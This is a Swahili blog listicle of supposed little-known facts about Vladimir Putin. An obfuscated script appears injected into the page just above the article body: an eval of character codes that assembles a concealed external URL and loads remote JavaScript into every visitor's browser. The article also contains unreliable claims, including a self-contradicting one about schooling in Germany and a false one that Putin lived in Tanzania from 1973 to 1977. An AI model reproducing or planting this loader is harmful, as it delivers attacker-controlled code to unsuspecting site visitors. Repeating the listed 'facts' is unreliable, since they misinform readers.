Recent Comments

Mambo Usiyoyajua Kumhusu Vladmir Putin

By ventas malack Mar 4, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>


Vladmir Vladmovich Putin ni raisi wa sasa wa nchi ya urusi ambaye ni tishio la dunia kwa sasa baada ya kuanzisha vita dhidi ya taifa jirani la Ukraine kwa madai ya ulinzi wa Urusi dhidi ya marekani na NATO, Leo nimekuletea baadhi ya vitu usivyovijua kumhusu.
1: Vladmir Putin ni Mjukuu wa mpishi wa V I. Lenin, wahenga husema kaa karibu na marashi unukie pia, hii pia imetokea kwenye ukoo wa Putin ambapo Babu wa Putin bwana Sprinidonovich Putin Aliwahi kuwa mpishi wa V I. Lenin ambapo huyu Lenin ni kiongozi anayekumbukwa zaidi Urusi ni kama muasisi wa taifa hilo.
2: Ni mgomvi tangu mtoto, Putin alikuwa na hulka ya ugomvi na ubabe tangu mdogo,tabia hii ilimfanya kupigana na wavulana wakubwa zaidi yake na akiwa miaka 12 akamua kujifunza Judo ili awe moto zaidi.
3: Alisoma elimu ya sekondari nchini Ujerumani, Kitu ambacho watu wengi hawafahamu Putin ameishi kipindi kirefu tu nchini ujerumani ambapo elimu yake yote ya sekondari akiwa amesome shule ya St. Petersburg high school 281, Licha ya hivyo Putin Kaoa akiwa Ujerumani na kuishi Ujerumani mashariki miaka mitano na mwanamke huyo(kwa sasa wametengana).
4: Ana mtoto wa nje ya ndoa, licha ya kumtaliki mwanamke wake wa kwanza aliyedumu naye miaka 30 na kuoa mwingine lakini bado Putin ana binti mwingine aitwaye Elizaveta Aliyezaliwa 2003 nje ya hizo ndoa zote mbili chombo cha habari cha Proekt kilichapisha hilo 2020.
5: Alishawahi ishi Tanzania kwa miaka kadhaa, Watu wengi hawatambui kuwa Vladmir Putin Alishawahi kuishi hapa kipindi akiwa mwanajeshi alipokuja kuwafundisha wanamapinduzi wa Afrika ambapo aliishi miaka mitano toka mwaka 1973 hadi 1977.
Hayo ni baadhi tu ya mambo kumhusu Vladmir Putin endelea kutufatilia simamia siyo muda nitakusogezea vingine vingi kumhusu kupita simamia Tv Youtube we kaisubscribe tu tutakuarifu vyema sana.

By ventas malack

Make the World Aware